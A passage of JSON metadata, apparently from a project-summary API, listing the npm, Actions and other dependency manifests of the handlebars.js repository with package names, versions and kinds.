uirements":"2.3.8","direct":false,"kind":"development","optional":false},{"id":93893469,"package_name":"time-stamp","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93893470,"package_name":"timers-browserify","ecosystem":"npm","requirements":"2.0.11","direct":false,"kind":"development","optional":false},{"id":93893471,"package_name":"tiny-lr","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93893472,"package_name":"tmp","ecosystem":"npm","requirements":"0.0.33","direct":false,"kind":"development","optional":false},{"id":93893473,"package_name":"to-arraybuffer","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893474,"package_name":"to-fast-properties","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93893475,"package_name":"to-object-path","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":93893476,"package_name":"to-regex","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93893477,"package_name":"to-regex-range","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93893478,"package_name":"toidentifier","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893479,"package_name":"tough-cookie","ecosystem":"npm","requirements":"2.5.0","direct":false,"kind":"development","optional":false},{"id":93893480,"package_name":"tree-kill","ecosystem":"npm","requirements":"1.2.2","direct":false,"kind":"development","optional":false},{"id":93893481,"package_name":"trim-newlines","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893482,"package_name":"trim-right","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893483,"package_name":"try-resolve","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893484,"package_name":"tryor","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93893485,"package_name":"tslib","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":93893486,"package_name":"tsutils","ecosystem":"npm","requirements":"2.29.0","direct":false,"kind":"development","optional":false},{"id":93893487,"package_name":"tty-browserify","ecosystem":"npm","requirements":"0.0.0","direct":false,"kind":"development","optional":false},{"id":93893488,"package_name":"tunnel-agent","ecosystem":"npm","requirements":"0.6.0","direct":false,"kind":"development","optional":false},{"id":93893489,"package_name":"tweetnacl","ecosystem":"npm","requirements":"0.14.5","direct":false,"kind":"development","optional":false},{"id":93893490,"package_name":"type-check","ecosystem":"npm","requirements":"0.3.2","direct":false,"kind":"development","optional":false},{"id":93893491,"package_name":"type-detect","ecosystem":"npm","requirements":"4.0.8","direct":false,"kind":"development","optional":false},{"id":93893492,"package_name":"type-fest","ecosystem":"npm","requirements":"0.8.1","direct":false,"kind":"development","optional":false},{"id":93893493,"package_name":"type-is","ecosystem":"npm","requirements":"1.6.18","direct":false,"kind":"development","optional":false},{"id":93893494,"package_name":"typedarray","ecosystem":"npm","requirements":"0.0.6","direct":false,"kind":"development","optional":false},{"id":93893495,"package_name":"typescript","ecosystem":"npm","requirements":"3.8.3","direct":false,"kind":"development","optional":false},{"id":93893496,"package_name":"uglify-js","ecosystem":"npm","requirements":"3.8.0","direct":false,"kind":"development","optional":false},{"id":93893497,"package_name":"uglify-to-browserify","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893498,"package_name":"unc-path-regex","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93893499,"package_name":"underscore","ecosystem":"npm","requirements":"1.13.4","direct":false,"kind":"development","optional":false},{"id":93893500,"package_name":"underscore.string","ecosystem":"npm","requirements":"3.3.6","direct":false,"kind":"development","optional":false},{"id":93893501,"package_name":"sprintf-js","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93893502,"package_name":"union-value","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893503,"package_name":"universalify","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93893504,"package_name":"unpipe","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893505,"package_name":"unset-value","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893506,"package_name":"has-value","ecosystem":"npm","requirements":"0.3.1","direct":false,"kind":"development","optional":false},{"id":93893507,"package_name":"has-values","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":93893508,"package_name":"uri-js","ecosystem":"npm","requirements":"4.2.2","direct":false,"kind":"development","optional":false},{"id":93893509,"package_name":"uri-path","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893510,"package_name":"urix","ecosystem":"npm","requirements":"0.1.0","direct":false,"kind":"development","optional":false},{"id":93893511,"package_name":"url","ecosystem":"npm","requirements":"0.10.3","direct":false,"kind":"development","optional":false},{"id":93893512,"package_name":"url-parse","ecosystem":"npm","requirements":"1.5.10","direct":false,"kind":"development","optional":false},{"id":93893513,"package_name":"use","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":93893514,"package_name":"user-home","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93893515,"package_name":"util","ecosystem":"npm","requirements":"0.10.4","direct":false,"kind":"development","optional":false},{"id":93893516,"package_name":"utils-merge","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893517,"package_name":"uuid","ecosystem":"npm","requirements":"3.4.0","direct":false,"kind":"development","optional":false},{"id":93893518,"package_name":"v8-compile-cache","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893519,"package_name":"v8flags","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":93893520,"package_name":"validate-npm-package-license","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":93893521,"package_name":"validate-npm-package-name","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893522,"package_name":"vary","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93893523,"package_name":"verror","ecosystem":"npm","requirements":"1.10.0","direct":false,"kind":"development","optional":false},{"id":93893524,"package_name":"vm-browserify","ecosystem":"npm","requirements":"0.0.4","direct":false,"kind":"development","optional":false},{"id":93893525,"package_name":"watchpack","ecosystem":"npm","requirements":"0.2.9","direct":false,"kind":"development","optional":false},{"id":93893526,"package_name":"async","ecosystem":"npm","requirements":"0.9.2","direct":false,"kind":"development","optional":false},{"id":93893527,"package_name":"webpack","ecosystem":"npm","requirements":"1.15.0","direct":false,"kind":"development","optional":false},{"id":93893528,"package_name":"acorn","ecosystem":"npm","requirements":"3.3.0","direct":false,"kind":"development","optional":false},{"id":93893529,"package_name":"has-flag","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893530,"package_name":"interpret","ecosystem":"npm","requirements":"0.6.6","direct":false,"kind":"development","optional":false},{"id":93893531,"package_name":"supports-color","ecosystem":"npm","requirements":"3.2.3","direct":false,"kind":"development","optional":false},{"id":93893532,"package_name":"uglify-js","ecosystem":"npm","requirements":"2.7.5","direct":false,"kind":"development","optional":false},{"id":93893533,"package_name":"webpack-core","ecosystem":"npm","requirements":"0.6.9","direct":false,"kind":"development","optional":false},{"id":93893534,"package_name":"source-map","ecosystem":"npm","requirements":"0.4.4","direct":false,"kind":"development","optional":false},{"id":93893535,"package_name":"webpack-dev-middleware","ecosystem":"npm","requirements":"1.12.2","direct":false,"kind":"development","optional":false},{"id":93893536,"package_name":"memory-fs","ecosystem":"npm","requirements":"0.4.1","direct":false,"kind":"development","optional":false},{"id":93893537,"package_name":"webpack-dev-server","ecosystem":"npm","requirements":"1.16.5","direct":false,"kind":"development","optional":false},{"id":93893538,"package_name":"websocket-driver","ecosystem":"npm","requirements":"0.7.3","direct":false,"kind":"development","optional":false},{"id":93893539,"package_name":"websocket-extensions","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":93893540,"package_name":"which","ecosystem":"npm","requirements":"1.3.1","direct":false,"kind":"development","optional":false},{"id":93893541,"package_name":"which-module","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893542,"package_name":"wide-align","ecosystem":"npm","requirements":"1.1.5","direct":false,"kind":"development","optional":false},{"id":93893543,"package_name":"window-size","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":93893544,"package_name":"word-wrap","ecosystem":"npm","requirements":"1.2.3","direct":false,"kind":"development","optional":false},{"id":93893545,"package_name":"wrap-ansi","ecosystem":"npm","requirements":"7.0.0","direct":false,"kind":"runtime","optional":false},{"id":93893546,"package_name":"write","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93893547,"package_name":"write-file-atomic","ecosystem":"npm","requirements":"2.4.3","direct":false,"kind":"development","optional":false},{"id":93893548,"package_name":"ws","ecosystem":"npm","requirements":"7.5.6","direct":false,"kind":"development","optional":false},{"id":93893549,"package_name":"xml2js","ecosystem":"npm","requirements":"0.4.19","direct":false,"kind":"development","optional":false},{"id":93893550,"package_name":"xmlbuilder","ecosystem":"npm","requirements":"9.0.7","direct":false,"kind":"development","optional":false},{"id":93893551,"package_name":"xtend","ecosystem":"npm","requirements":"4.0.2","direct":false,"kind":"development","optional":false},{"id":93893552,"package_name":"y18n","ecosystem":"npm","requirements":"4.0.3","direct":false,"kind":"development","optional":false},{"id":93893553,"package_name":"yallist","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","optional":false},{"id":93893554,"package_name":"yargs","ecosystem":"npm","requirements":"16.2.0","direct":false,"kind":"runtime","optional":false},{"id":93893555,"package_name":"y18n","ecosystem":"npm","requirements":"5.0.8","direct":false,"kind":"runtime","optional":false},{"id":93893556,"package_name":"yargs-parser","ecosystem":"npm","requirements":"20.2.9","direct":false,"kind":"runtime","optional":false},{"id":93893557,"package_name":"yauzl","ecosystem":"npm","requirements":"2.10.0","direct":false,"kind":"development","optional":false},{"id":93893558,"package_name":"yazl","ecosystem":"npm","requirements":"2.5.1","direct":false,"kind":"development","optional":false},{"id":93893559,"package_name":"yocto-queue","ecosystem":"npm","requirements":"0.1.0","direct":false,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"package.json","sha":null,"kind":"manifest","created_at":"2022-06-29T08:07:45.266Z","updated_at":"2022-06-29T08:07:45.266Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/package.json","dependencies":[{"id":93896268,"package_name":"@handlebars/parser","ecosystem":"npm","requirements":"^1.1.0","direct":true,"kind":"runtime","optional":false},{"id":93896269,"package_name":"neo-async","ecosystem":"npm","requirements":"^2.6.2","direct":true,"kind":"runtime","optional":false},{"id":93896270,"package_name":"source-map","ecosystem":"npm","requirements":"^0.6.1","direct":true,"kind":"runtime","optional":false},{"id":93896271,"package_name":"yargs","ecosystem":"npm","requirements":"^16.2.0","direct":true,"kind":"runtime","optional":false},{"id":93896272,"package_name":"@definitelytyped/dtslint","ecosystem":"npm","requirements":"^0.0.100","direct":true,"kind":"development","optional":false},{"id":93896273,"package_name":"@playwright/test","ecosystem":"npm","requirements":"^1.17.1","direct":true,"kind":"development","optional":false},{"id":93896274,"package_name":"aws-sdk","ecosystem":"npm","requirements":"^2.1.49","direct":true,"kind":"development","optional":false},{"id":93896275,"package_name":"babel-loader","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"development","optional":false},{"id":93896276,"package_name":"babel-runtime","ecosystem":"npm","requirements":"^5.1.10","direct":true,"kind":"development","optional":false},{"id":93896277,"package_name":"benchmark","ecosystem":"npm","requirements":"~1.0","direct":true,"kind":"development","optional":false},{"id":93896278,"package_name":"chai","ecosystem":"npm","requirements":"^4.2.0","direct":true,"kind":"development","optional":false},{"id":93896279,"package_name":"chai-diff","ecosystem":"npm","requirements":"^1.0.1","direct":true,"kind":"development","optional":false},{"id":93896280,"package_name":"concurrently","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"development","optional":false},{"id":93896281,"package_name":"dirty-chai","ecosystem":"npm","requirements":"^2.0.1","direct":true,"kind":"development","optional":false},{"id":93896282,"package_name":"dustjs-linkedin","ecosystem":"npm","requirements":"^2.0.2","direct":true,"kind":"development","optional":false},{"id":93896283,"package_name":"eslint","ecosystem":"npm","requirements":"^6.7.2","direct":true,"kind":"development","optional":false},{"id":93896284,"package_name":"eslint-config-prettier","ecosystem":"npm","requirements":"^6.7.0","direct":true,"kind":"development","optional":false},{"id":93896285,"package_name":"eslint-plugin-compat","ecosystem":"npm","requirements":"^3.13.0","direct":true,"kind":"development","optional":false},{"id":93896286,"package_name":"eslint-plugin-es5","ecosystem":"npm","requirements":"^1.4.1","direct":true,"kind":"development","optional":false},{"id":93896287,"package_name":"fs-extra","ecosystem":"npm","requirements":"^8.1.0","direct":true,"kind":"development","optional":false},{"id":93896288,"package_name":"grunt","ecosystem":"npm","requirements":"^1.0.4","direct":true,"kind":"development","optional":false},{"id":93896289,"package_name":"grunt-babel","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"development","optional":false},{"id":93896290,"package_name":"grunt-bg-shell","ecosystem":"npm","requirements":"^2.3.3","direct":true,"kind":"development","optional":false},{"id":93896291,"package_name":"grunt-cli","ecosystem":"npm","requirements":"^1","direct":true,"kind":"development","optional":false},{"id":93896292,"package_name":"grunt-contrib-clean","ecosystem":"npm","requirements":"^1","direct":true,"kind":"development","optional":false},{"id":93896293,"package_name":"grunt-contrib-concat","ecosystem":"npm","requirements":"^1","direct":true,"kind":"development","optional":false},{"id":93896294,"package_name":"grunt-contrib-connect","ecosystem":"npm","requirements":"^1","direct":true,"kind":"development","optional":false},{"id":93896295,"package_name":"grunt-contrib-copy","ecosystem":"npm","requirements":"^1","direct":true,"kind":"development","optional":false},{"id":93896296,"package_name":"grunt-contrib-requirejs","ecosystem":"npm","requirements":"^1","direct":true,"kind":"development","optional":false},{"id":93896297,"package_name":"grunt-contrib-uglify","ecosystem":"npm","requirements":"^1","direct":true,"kind":"development","optional":false},{"id":93896298,"package_name":"grunt-contrib-watch","ecosystem":"npm","requirements":"^1.1.0","direct":true,"kind":"development","optional":false},{"id":93896299,"package_name":"grunt-webpack","ecosystem":"npm","requirements":"^1.0.8","direct":true,"kind":"development","optional":false},{"id":93896300,"package_name":"husky","ecosystem":"npm","requirements":"^3.1.0","direct":true,"kind":"development","optional":false},{"id":93896301,"package_name":"lint-staged","ecosystem":"npm","requirements":"^9.5.0","direct":true,"kind":"development","optional":false},{"id":93896302,"package_name":"mocha","ecosystem":"npm","requirements":"^5","direct":true,"kind":"development","optional":false},{"id":93896303,"package_name":"mock-stdin","ecosystem":"npm","requirements":"^0.3.0","direct":true,"kind":"development","optional":false},{"id":93896304,"package_name":"mustache","ecosystem":"npm","requirements":"^2.1.3","direct":true,"kind":"development","optional":false},{"id":93896305,"package_name":"nyc","ecosystem":"npm","requirements":"^14.1.1","direct":true,"kind":"development","optional":false},{"id":93896306,"package_name":"prettier","ecosystem":"npm","requirements":"^1.19.1","direct":true,"kind":"development","optional":false},{"id":93896307,"package_name":"semver","ecosystem":"npm","requirements":"^5.0.1","direct":true,"kind":"development","optional":false},{"id":93896308,"package_name":"sinon","ecosystem":"npm","requirements":"^7.5.0","direct":true,"kind":"development","optional":false},{"id":93896309,"package_name":"typescript","ecosystem":"npm","requirements":"^3.4.3","direct":true,"kind":"development","optional":false},{"id":93896310,"package_name":"uglify-js","ecosystem":"npm","requirements":"^3.1.4","direct":true,"kind":"development","optional":false},{"id":93896311,"package_name":"underscore","ecosystem":"npm","requirements":"^1.5.1","direct":true,"kind":"development","optional":false},{"id":93896312,"package_name":"webpack","ecosystem":"npm","requirements":"^1.12.6","direct":true,"kind":"development","optional":false},{"id":93896313,"package_name":"webpack-dev-server","ecosystem":"npm","requirements":"^1.12.1","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"tests/integration/multi-nodejs-test/package.json","sha":null,"kind":"manifest","created_at":"2022-06-29T08:07:45.532Z","updated_at":"2022-06-29T08:07:45.532Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/tests/integration/multi-nodejs-test/package.json","dependencies":[{"id":93896334,"package_name":"handlebars","ecosystem":"npm","requirements":"file:../../..","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"tests/integration/rollup-test/package.json","sha":null,"kind":"manifest","created_at":"2022-06-29T08:07:45.731Z","updated_at":"2022-06-29T08:07:45.731Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/tests/integration/rollup-test/package.json","dependencies":[{"id":93896353,"package_name":"@rollup/plugin-node-resolve","ecosystem":"npm","requirements":"^13.1.1","direct":true,"kind":"development","optional":false},{"id":93896354,"package_name":"handlebars","ecosystem":"npm","requirements":"file:../../..","direct":true,"kind":"development","optional":false},{"id":93896355,"package_name":"rollup","ecosystem":"npm","requirements":"^2.61.1","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"tests/integration/webpack-babel-test/package.json","sha":null,"kind":"manifest","created_at":"2022-06-29T08:07:46.085Z","updated_at":"2022-06-29T08:07:46.085Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/tests/integration/webpack-babel-test/package.json","dependencies":[{"id":93898467,"package_name":"@babel/core","ecosystem":"npm","requirements":"^7.5.5","direct":true,"kind":"runtime","optional":false},{"id":93898468,"package_name":"@babel/preset-env","ecosystem":"npm","requirements":"^7.5.5","direct":true,"kind":"runtime","optional":false},{"id":93898469,"package_name":"@roundingwellos/babel-plugin-handlebars-inline-precompile","ecosystem":"npm","requirements":"^3.0.1","direct":true,"kind":"runtime","optional":false},{"id":93898470,"package_name":"babel-loader","ecosystem":"npm","requirements":"^8.0.6","direct":true,"kind":"runtime","optional":false},{"id":93898471,"package_name":"babel-plugin-istanbul","ecosystem":"npm","requirements":"^5.2.0","direct":true,"kind":"runtime","optional":false},{"id":93898472,"package_name":"handlebars","ecosystem":"npm","requirements":"file:../../..","direct":true,"kind":"runtime","optional":false},{"id":93898473,"package_name":"handlebars-loader","ecosystem":"npm","requirements":"^1.7.1","direct":true,"kind":"runtime","optional":false},{"id":93898474,"package_name":"nyc","ecosystem":"npm","requirements":"^14.1.1","direct":true,"kind":"runtime","optional":false},{"id":93898475,"package_name":"webpack","ecosystem":"npm","requirements":"^4.39.3","direct":true,"kind":"runtime","optional":false},{"id":93898476,"package_name":"webpack-cli","ecosystem":"npm","requirements":"^3.3.7","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"tests/integration/webpack-test/package.json","sha":null,"kind":"manifest","created_at":"2022-06-29T08:07:46.512Z","updated_at":"2022-06-29T08:07:46.512Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/tests/integration/webpack-test/package.json","dependencies":[{"id":93899205,"package_name":"handlebars","ecosystem":"npm","requirements":"file:../../..","direct":true,"kind":"runtime","optional":false},{"id":93899206,"package_name":"handlebars-loader","ecosystem":"npm","requirements":"^1.7.1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"packagist","filepath":"components/composer.json","sha":null,"kind":"manifest","created_at":"2022-06-29T08:07:47.043Z","updated_at":"2022-06-29T08:07:47.043Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/components/composer.json","dependencies":[{"id":93901681,"package_name":"robloach/component-installer","ecosystem":"packagist","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/ci.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T10:50:31.568Z","updated_at":"2023-01-13T10:50:31.568Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/.github/workflows/ci.yml","dependencies":[{"id":6875561205,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6875561206,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T06:08:39.824Z","updated_at":"2023-09-22T06:08:39.824Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/.github/workflows/release.yml","dependencies":[{"id":13867164080,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":13867164081,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"bower","filepath":"components/bower.json","sha":null,"kind":"manifest","created_at":"2023-09-22T06:08:39.894Z","updated_at":"2023-09-22T06:08:39.894Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/components/bower.json","dependencies":[]},{"ecosystem":"npm","filepath":"components/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T06:08:39.922Z","updated_at":"2023-09-22T06:08:39.922Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/components/package.json","dependencies":[]},{"ecosystem":"nuget","filepath":"components/handlebars.js.nuspec","sha":null,"kind":"manifest","created_at":"2023-09-22T06:08:40.219Z","updated_at":"2023-09-22T06:08:40.219Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/components/handlebars.js.nuspec","dependencies":[]},{"ecosystem":"rubygems","filepath":"components/handlebars-source.gemspec","sha":null,"kind":"manifest","created_at":"2023-09-22T06:08:40.442Z","updated_at":"2023-09-22T06:08:40.442Z","repository_link":"https://github.com/handlebars-lang/handlebars.js/blob/master/components/handlebars-source.gemspec","dependencies":[]}],"score":37.35366616025297,"created_at":"2026-07-08T06:30:36.152Z","updated_at":"2026-07-22T14:01:33.861Z","avatar_url":"https://github.com/handlebars-lang.png","language":"JavaScript","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/377992","html_url":"https://summary.ecosyste.ms/projects/377992"}